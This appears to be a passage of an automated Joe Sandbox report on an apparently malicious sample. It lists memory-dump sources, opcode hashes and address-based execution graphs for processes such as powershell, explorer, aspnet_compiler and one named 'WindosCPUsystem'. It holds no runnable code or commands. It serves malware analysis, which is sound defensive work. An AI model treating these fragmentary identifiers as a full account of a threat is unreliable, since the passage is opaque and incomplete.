                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f46ea86b4993e53135c45956830a700c83c9b065975e74f185489814ca6329c1
                                                                                                        • Instruction ID: fed0ca076627b5d12bc0e4dcfbe7c04753347e11e38061a96e13c362391befae
                                                                                                        • Opcode Fuzzy Hash: f46ea86b4993e53135c45956830a700c83c9b065975e74f185489814ca6329c1
                                                                                                        • Instruction Fuzzy Hash: 7FE0E51104F3E22FD3439778A8A24D67F309D0716870942E7D0C4CE093D60C954AC3A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7c9ad786969763d22a7885d09eb58e37a5514e84f19f8d428110b0113b133d13
                                                                                                        • Instruction ID: 294ce6f6d6f1657feb7e65db566d2aa51520a9e04251c2393e6caa08825afe4b
                                                                                                        • Opcode Fuzzy Hash: 7c9ad786969763d22a7885d09eb58e37a5514e84f19f8d428110b0113b133d13
                                                                                                        • Instruction Fuzzy Hash: 5EE0203171C6554EEB7826BD644C77363C4DB98365F10453AD008C32C0D97C94858780
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cd25092632d961d4413a513d02c8976acc4773871cb1abd99fec50a9eb6bb65a
                                                                                                        • Instruction ID: 4065339e0e7912eca143ab563a479818184e075dbba3e9fb8079913e866d6069
                                                                                                        • Opcode Fuzzy Hash: cd25092632d961d4413a513d02c8976acc4773871cb1abd99fec50a9eb6bb65a
                                                                                                        • Instruction Fuzzy Hash: 37D01700F5C8AE0EEDACBA7834192BE91C2CBC979079058B5E40DC628ADD2CDC421380
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e82a63731ebfef2ba25e8db5fd86ed7581b6fc0fd8f78c18b2c53c3cca0c4e20
                                                                                                        • Instruction ID: 81550cc5427eff433dc9454f47b97522305f818add7bac7ede841c8dc688e6d8
                                                                                                        • Opcode Fuzzy Hash: e82a63731ebfef2ba25e8db5fd86ed7581b6fc0fd8f78c18b2c53c3cca0c4e20
                                                                                                        • Instruction Fuzzy Hash: CBB09212B1DC190FA2A0628D3C821B8A281D788661B5801B3E008C228ADA099D8602C6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: pI
                                                                                                        • API String ID: 0-1830608477
                                                                                                        • Opcode ID: 9acdb91f26a2553d670d3e1bd15eb80c48ad24bb877afc4663d1922fd849ac81
                                                                                                        • Instruction ID: 654a0f0931f70d70f347e37e7a69c43ff184b9adf1494c6856a143b007992d2b
                                                                                                        • Opcode Fuzzy Hash: 9acdb91f26a2553d670d3e1bd15eb80c48ad24bb877afc4663d1922fd849ac81
                                                                                                        • Instruction Fuzzy Hash: CEA1F75381F6D29FE665BBBCB8511E73BA0FF12768B0C02B6D08C4E197DD1CA84682D5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2225191412.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (B#I$(B#I$(B#I$(B#I$(B#I
                                                                                                        • API String ID: 0-1620291718
                                                                                                        • Opcode ID: 5bc35c56eacf151fc54a3bc5a54a3c0d6d9175490abf6d6142b826c9431d3de0
                                                                                                        • Instruction ID: 95a41cef324c82138c54b37f5663ca696c71ed31233585cb0c7095617e438f95
                                                                                                        • Opcode Fuzzy Hash: 5bc35c56eacf151fc54a3bc5a54a3c0d6d9175490abf6d6142b826c9431d3de0
                                                                                                        • Instruction Fuzzy Hash: 83D13131D1EA8E5FEBA9AB2858555B9BBA1EF16350F1801FAD40DCB0D3EA1CAC01C355
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2225191412.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8>#I
                                                                                                        • API String ID: 0-2340899229
                                                                                                        • Opcode ID: 715f2d1f18e9318e6af317db18184ff68142fdcd9a28c68efc7bfca4c90f2c2c
                                                                                                        • Instruction ID: de745661b903b567d36aa5c71d21d3ec714641d03bdefe31c52cef11873a2b56
                                                                                                        • Opcode Fuzzy Hash: 715f2d1f18e9318e6af317db18184ff68142fdcd9a28c68efc7bfca4c90f2c2c
                                                                                                        • Instruction Fuzzy Hash: 4051E432E0DE8A4FEBAAEB2C941167577D2EFA4660F1801BEC14DC71D2DF1CE8058249
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2225191412.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: p>#I
                                                                                                        • API String ID: 0-3576117583
                                                                                                        • Opcode ID: 594f0af8dbae77f22dd6f4595d9169acaab955b82bbe5ec04605a9df822eb677
                                                                                                        • Instruction ID: f7353fd16b4330a6ef93f9a57ec6d289bb3903dee1f423bef1de509a2ecdc713
                                                                                                        • Opcode Fuzzy Hash: 594f0af8dbae77f22dd6f4595d9169acaab955b82bbe5ec04605a9df822eb677
                                                                                                        • Instruction Fuzzy Hash: 15411232E0DE894FE7A9EB2C68116B47BE1EF64660F0801BEC54DC71C7EA1CAC118385
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2225191412.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8>#I
                                                                                                        • API String ID: 0-2340899229
                                                                                                        • Opcode ID: 8acca736745a6f662df9e264b9af29c538983d36e78673c3ec14ef90ff5d2e95
                                                                                                        • Instruction ID: ac568189ce7307ac677044ff336462a368be3e4b9758b90e8278e1128597cef6
                                                                                                        • Opcode Fuzzy Hash: 8acca736745a6f662df9e264b9af29c538983d36e78673c3ec14ef90ff5d2e95
                                                                                                        • Instruction Fuzzy Hash: 1121C032D1DE864FEBAAEB1C985017466D2FF74290F5900BEC14DC71E2DF1C9C448249
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2225191412.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: p>#I
                                                                                                        • API String ID: 0-3576117583
                                                                                                        • Opcode ID: 6dddfa4f48ffd10f56ebd5f777617e8d587fef2202773a8ead9c8efa45f98fcd
                                                                                                        • Instruction ID: bf8fc00af0f996a885d9ac408de3b346d330ff727058f3b939c446dd8c979ea1
                                                                                                        • Opcode Fuzzy Hash: 6dddfa4f48ffd10f56ebd5f777617e8d587fef2202773a8ead9c8efa45f98fcd
                                                                                                        • Instruction Fuzzy Hash: 8A11CE32E0EA894FE3A5EB2C98505B87AE1FF60660F5900BED44DC74D2DB1DAC108385
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2224519908.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 09f19afe34be1725c0a30ca3467dd1fdbb02d356badbd2c1a37c6b083bb51111
                                                                                                        • Instruction ID: 50f240c869ecc85ae5a4c48387398d592b0d0c58d3db22b99e726438b106a2dd
                                                                                                        • Opcode Fuzzy Hash: 09f19afe34be1725c0a30ca3467dd1fdbb02d356badbd2c1a37c6b083bb51111
                                                                                                        • Instruction Fuzzy Hash: B341DB77C0DA914FE355AB6CA8964E53B90FF11FDAF0802B6D08C8A0D3EE186C858685
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2224519908.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9909ba3251d33266e90f4c88058996d7622ae68367632069e4027b124f841016
                                                                                                        • Instruction ID: b493a6d3db7341c661824d4b514081a2a454e25d50fb9c2309f19c347108714b
                                                                                                        • Opcode Fuzzy Hash: 9909ba3251d33266e90f4c88058996d7622ae68367632069e4027b124f841016
                                                                                                        • Instruction Fuzzy Hash: 92414D71D0CB889FDB18AB5CAC067B97BE1FB54710F10416FE04993696DB74AC468BC2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2223731537.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848dfd000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b055a01bd6cf583f9be3ef232f9a9ac45b2fb1523b9cebd449f6d7afd3705e6c
                                                                                                        • Instruction ID: f86c383ab288c4b0d573f4660b37e80c8bff4108808a4b9b014f38f32d438f76
                                                                                                        • Opcode Fuzzy Hash: b055a01bd6cf583f9be3ef232f9a9ac45b2fb1523b9cebd449f6d7afd3705e6c
                                                                                                        • Instruction Fuzzy Hash: 7341027180EBC44FE7569B289849A563FF0EF52365F1502EFD088CB1A3D725E84AC792
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2224519908.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 826376571938ca7e20f6d516cdf588b7f0702c4565a6ecec84f475d376877543
                                                                                                        • Instruction ID: 561fbd8c227b668c1e2f36e57ac8f5740fd4fc50522bcdf6ca8fd43ca9ae5a7d
                                                                                                        • Opcode Fuzzy Hash: 826376571938ca7e20f6d516cdf588b7f0702c4565a6ecec84f475d376877543
                                                                                                        • Instruction Fuzzy Hash: 8921E63190C74C8FDB59DBAC984A7E97BF0EB96321F04426BD049C3152DA749456CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2224519908.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                        • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                        • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2224519908.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                                        • API String ID: 0-4116931533
                                                                                                        • Opcode ID: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
                                                                                                        • Instruction ID: 58a37288408cec2b7841e32effd1dac45db3f07ecb65aa4a0ef07aed3610af80
                                                                                                        • Opcode Fuzzy Hash: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
                                                                                                        • Instruction Fuzzy Hash: 1B21027771A426AFD30277EDBC105D97790EB942BAB4802B3D358CF503DA18608B87E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2224519908.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: N_^$N_^$N_^$N_^
                                                                                                        • API String ID: 0-3900292545
                                                                                                        • Opcode ID: 4c7165383706c89994039df35c5f292cc68dc3bb38e90c62960c8587f7665e4e
                                                                                                        • Instruction ID: c8b8886687305b2a41d1eba2b953a3d5750cd3a52f0bbcab52165bdf2f0273da
                                                                                                        • Opcode Fuzzy Hash: 4c7165383706c89994039df35c5f292cc68dc3bb38e90c62960c8587f7665e4e
                                                                                                        • Instruction Fuzzy Hash: E741A476E0EAC25FF34A97284D650A16F50FF52798B4D01F6C1888B0D3EE189C079256
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2197848088.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_140000000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 69feff347bfda074aa7f07e48b7f2b5744d9c7d3b152f021baa2038210904211
                                                                                                        • Instruction ID: e76669c8f4f670c94b621c8b927ebc9d9c9485ce5bf3cc4b479e0f1cdb2a001a
                                                                                                        • Opcode Fuzzy Hash: 69feff347bfda074aa7f07e48b7f2b5744d9c7d3b152f021baa2038210904211
                                                                                                        • Instruction Fuzzy Hash: B7B012B050030884E306AF13F8413C93660674C7C0F400000F70813372C67940404B10
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.3379271328.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.3379240868.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.3379697446.00000001404C8000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.3379697446.00000001404EC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.3379697446.00000001404EF000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.3379697446.0000000140777000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.3379697446.00000001407F8000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.3379949484.00000001407FB000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.3379991572.000000014081B000.00000020.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.3380024651.0000000140821000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_140000000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2933794660-0
                                                                                                        • Opcode ID: 50963c1dba7b536eca43502744e0d9cb47a5b65a5662e8b8edda2bbabb9365db
                                                                                                        • Instruction ID: 79b49984e369f14b3cfd6b091ae87a2c1abf041b5e0bbbfb70a1ccaeb1af311f
                                                                                                        • Opcode Fuzzy Hash: 50963c1dba7b536eca43502744e0d9cb47a5b65a5662e8b8edda2bbabb9365db
                                                                                                        • Instruction Fuzzy Hash: 89112736710F018AEB11CF61E8553A933A4F75DB58F481E25EB6D86BA4DBB8C1998340

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.6%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:5
                                                                                                        Total number of Limit Nodes:1
                                                                                                        execution_graph 24150 7ff848f35c40 24151 7ff848f46e90 24150->24151 24152 7ff848f4724d VirtualAlloc 24151->24152 24154 7ff848f47093 24151->24154 24153 7ff848f472a5 24152->24153

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 364 7ff8490d31f2-7ff8490d3209 366 7ff8490d3217-7ff8490d326f 364->366 367 7ff8490d320b-7ff8490d3216 364->367 370 7ff8490d3271-7ff8490d3276 366->370 371 7ff8490d3279-7ff8490d3289 366->371 367->366 370->371 372 7ff8490d328f-7ff8490d32a9 371->372 373 7ff8490d3799-7ff8490d37a4 371->373 377 7ff8490d36a6-7ff8490d36b1 372->377 378 7ff8490d32af-7ff8490d32ba 372->378 374 7ff8490d37a6-7ff8490d37ab 373->374 375 7ff8490d37ae-7ff8490d3801 373->375 374->375 379 7ff8490d3808-7ff8490d380e 375->379 386 7ff8490d36a1 377->386 387 7ff8490d36b3-7ff8490d36f8 377->387 380 7ff8490d32d7-7ff8490d3310 378->380 381 7ff8490d32bc-7ff8490d32cd 378->381 382 7ff8490d3814-7ff8490d381d 379->382 383 7ff8490d3738-7ff8490d3743 379->383 399 7ff8490d3312-7ff8490d3331 380->399 400 7ff8490d333b-7ff8490d33a0 380->400 381->380 396 7ff8490d32cf-7ff8490d32d4 381->396 388 7ff8490d3823-7ff8490d382e 382->388 389 7ff8490d3a08-7ff8490d3a1f 382->389 383->373 386->377 398 7ff8490d36ff-7ff8490d3731 387->398 388->389 393 7ff8490d3834-7ff8490d3837 388->393 395 7ff8490d3a22-7ff8490d3a56 389->395 397 7ff8490d383d-7ff8490d38de call 7ff8490d2ec8 393->397 393->398 396->380 433 7ff8490d38e4-7ff8490d38ec 397->433 434 7ff8490d3b0d-7ff8490d3b16 397->434 398->383 399->400 413 7ff8490d3597-7ff8490d359a 400->413 416 7ff8490d35a0-7ff8490d35b8 413->416 417 7ff8490d3639-7ff8490d3640 413->417 423 7ff8490d3b6e-7ff8490d3b86 416->423 424 7ff8490d35be-7ff8490d35c5 416->424 420 7ff8490d3bd2-7ff8490d3bf2 call 7ff8490d3bf3 417->420 430 7ff8490d3b8c-7ff8490d3b97 423->430 431 7ff8490d364a-7ff8490d369f 423->431 427 7ff8490d35c7-7ff8490d35e9 424->427 436 7ff8490d35f0-7ff8490d35fc 427->436 430->420 431->386 439 7ff8490d38ee-7ff8490d38f3 433->439 440 7ff8490d38fb-7ff8490d3912 433->440 437 7ff8490d3b1c-7ff8490d3b24 434->437 438 7ff8490d39b8-7ff8490d39dc 434->438 441 7ff8490d35fe-7ff8490d3607 436->441 442 7ff8490d3609-7ff8490d3637 436->442 437->438 443 7ff8490d3b2a-7ff8490d3b33 437->443 438->413 447 7ff8490d39e2-7ff8490d39ee 438->447 439->440 454 7ff8490d3918-7ff8490d39b2 call 7ff8490d2e58 440->454 455 7ff8490d3a5b-7ff8490d3a96 440->455 441->417 441->442 442->417 443->438 448 7ff8490d3b39-7ff8490d3b69 call 7ff8490d2e18 443->448 447->395 448->438 454->438 457 7ff8490d3ab0-7ff8490d3ab4 455->457 458 7ff8490d3a98-7ff8490d3aae 455->458 462 7ff8490d3ab7-7ff8490d3b08 457->462 458->462 462->438
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: l9_H
                                                                                                        • API String ID: 0-1042989441
                                                                                                        • Opcode ID: dcb6a717c50da7bc159e3d1ab2640b71b43840b3a54459c9d0ac327fab265c13
                                                                                                        • Instruction ID: 0ed8dab0a5d0b22ff3fc306481ec1aff207ecadc75a87e60557e70dd517a1a16
                                                                                                        • Opcode Fuzzy Hash: dcb6a717c50da7bc159e3d1ab2640b71b43840b3a54459c9d0ac327fab265c13
                                                                                                        • Instruction Fuzzy Hash: 5542A231A1CA8A8FEB98EF18C4957B977E1FF98744F540579D44AC7286CE38E842C781
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 63_^
                                                                                                        • API String ID: 0-1675173568
                                                                                                        • Opcode ID: c8776474a3b97c4f1dbbf052766b2b72223b898358534ca3e7fe0967e18ef06f
                                                                                                        • Instruction ID: 057c684d08932c04ad142f57782b4b1e0b5223d17562923bfb55c40e6b03c9db
                                                                                                        • Opcode Fuzzy Hash: c8776474a3b97c4f1dbbf052766b2b72223b898358534ca3e7fe0967e18ef06f
                                                                                                        • Instruction Fuzzy Hash: 34A13732E1EB869EE654FB78A4855F6B7E0FF54358F14437AC04D8B183CE2DB8428295

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1475 7ff8490dcc43-7ff8490dcc75 1479 7ff8490dcc77 1475->1479 1480 7ff8490dcc79-7ff8490dcc9f 1475->1480 1479->1480 1481 7ff8490dccb9 1479->1481 1484 7ff8490dccba-7ff8490dccd3 1480->1484 1485 7ff8490dcca1-7ff8490dccb7 1480->1485 1481->1484 1486 7ff8490dcd71-7ff8490dcdae 1484->1486 1487 7ff8490dccd9-7ff8490dcce6 1484->1487 1485->1481 1494 7ff8490dcdb5-7ff8490dcdcd 1486->1494 1492 7ff8490dcd04-7ff8490dcd07 1487->1492 1493 7ff8490dcce8-7ff8490dccf9 1487->1493 1492->1494 1495 7ff8490dcd0d-7ff8490dcd55 1492->1495 1497 7ff8490dccfe-7ff8490dcd02 1493->1497 1502 7ff8490dcdd0-7ff8490dcdec 1494->1502 1503 7ff8490dcdcf 1494->1503 1495->1494 1498 7ff8490dcd57-7ff8490dcd5b 1495->1498 1497->1498 1505 7ff8490dcd62-7ff8490dcd70 1498->1505 1506 7ff8490dcdf2-7ff8490dcdf8 1502->1506 1507 7ff8490dce89-7ff8490dcebc 1502->1507 1503->1502 1509 7ff8490dce18-7ff8490dce26 1506->1509 1510 7ff8490dcdfa-7ff8490dcdfd 1506->1510 1517 7ff8490dcec3-7ff8490dcf06 1507->1517 1509->1517 1518 7ff8490dce2c-7ff8490dce44 1509->1518 1512 7ff8490dce45-7ff8490dce82 1510->1512 1513 7ff8490dcdff-7ff8490dce17 1510->1513 1512->1507 1525 7ff8490dcf0d-7ff8490dcf0f 1517->1525 1526 7ff8490dcf11-7ff8490dcf29 1525->1526 1527 7ff8490dcf2a-7ff8490dcf90 1525->1527 1534 7ff8490dcfa2-7ff8490dcfa6 1527->1534 1535 7ff8490dcf92-7ff8490dcf9d call 7ff8490dcb60 1527->1535 1536 7ff8490dcfb4-7ff8490dcfc1 1534->1536 1537 7ff8490dcfa8-7ff8490dcfb3 1534->1537 1535->1534 1539 7ff8490dd417-7ff8490dd45f 1536->1539 1540 7ff8490dcfc7-7ff8490dcfda 1536->1540 1552 7ff8490dd466-7ff8490dd47f 1539->1552 1553 7ff8490dd461 1539->1553 1541 7ff8490dcfdc-7ff8490dcfe7 1540->1541 1542 7ff8490dcfe8-7ff8490dcff3 1540->1542 1544 7ff8490dcff9-7ff8490dd005 1542->1544 1545 7ff8490dd24a-7ff8490dd271 1542->1545 1544->1539 1547 7ff8490dd00b-7ff8490dd026 1544->1547 1555 7ff8490dd278-7ff8490dd29f 1545->1555 1550 7ff8490dd034-7ff8490dd038 1547->1550 1551 7ff8490dd028-7ff8490dd033 1547->1551 1554 7ff8490dd03e-7ff8490dd04a 1550->1554 1550->1555 1574 7ff8490dd481-7ff8490dd498 1552->1574 1575 7ff8490dd49c-7ff8490dd526 1552->1575 1553->1552 1554->1539 1558 7ff8490dd050-7ff8490dd06b 1554->1558 1566 7ff8490dd2a6-7ff8490dd2b1 1555->1566 1560 7ff8490dd077-7ff8490dd07b 1558->1560 1561 7ff8490dd06d-7ff8490dd072 1558->1561 1560->1566 1567 7ff8490dd081-7ff8490dd08d 1560->1567 1565 7ff8490dd243-7ff8490dd249 1561->1565 1572 7ff8490dd305 1566->1572 1573 7ff8490dd2b3-7ff8490dd2cd 1566->1573 1567->1539 1570 7ff8490dd093-7ff8490dd0ae 1567->1570 1576 7ff8490dd0b0-7ff8490dd0b5 1570->1576 1577 7ff8490dd0ba-7ff8490dd0be 1570->1577 1580 7ff8490dd307-7ff8490dd30f 1572->1580 1581 7ff8490dd311-7ff8490dd329 1572->1581 1578 7ff8490dd2d4-7ff8490dd2fb 1573->1578 1574->1575 1576->1565 1577->1578 1579 7ff8490dd0c4-7ff8490dd0d0 1577->1579 1592 7ff8490dd302-7ff8490dd303 1578->1592 1579->1539 1584 7ff8490dd0d6-7ff8490dd0f1 1579->1584 1580->1581 1599 7ff8490dd330-7ff8490dd357 1581->1599 1587 7ff8490dd0f3-7ff8490dd0f8 1584->1587 1588 7ff8490dd0fd-7ff8490dd101 1584->1588 1587->1565 1591 7ff8490dd107-7ff8490dd113 1588->1591 1588->1592 1591->1539 1594 7ff8490dd119-7ff8490dd134 1591->1594 1592->1572 1597 7ff8490dd136-7ff8490dd13b 1594->1597 1598 7ff8490dd140-7ff8490dd144 1594->1598 1597->1565 1598->1599 1600 7ff8490dd14a-7ff8490dd156 1598->1600 1607 7ff8490dd35e-7ff8490dd369 1599->1607 1600->1539 1602 7ff8490dd15c-7ff8490dd177 1600->1602 1603 7ff8490dd183-7ff8490dd187 1602->1603 1604 7ff8490dd179-7ff8490dd17e 1602->1604 1606 7ff8490dd18d-7ff8490dd199 1603->1606 1603->1607 1604->1565 1606->1539 1609 7ff8490dd19f-7ff8490dd1ba 1606->1609 1611 7ff8490dd1c6-7ff8490dd1ca 1609->1611 1612 7ff8490dd1bc-7ff8490dd1c1 1609->1612 1613 7ff8490dd1d0-7ff8490dd1dc 1611->1613 1614 7ff8490dd38c-7ff8490dd3b3 1611->1614 1612->1565 1613->1539 1615 7ff8490dd1e2-7ff8490dd1fd 1613->1615 1620 7ff8490dd3ba-7ff8490dd3e1 1614->1620 1617 7ff8490dd206-7ff8490dd20a 1615->1617 1618 7ff8490dd1ff-7ff8490dd204 1615->1618 1619 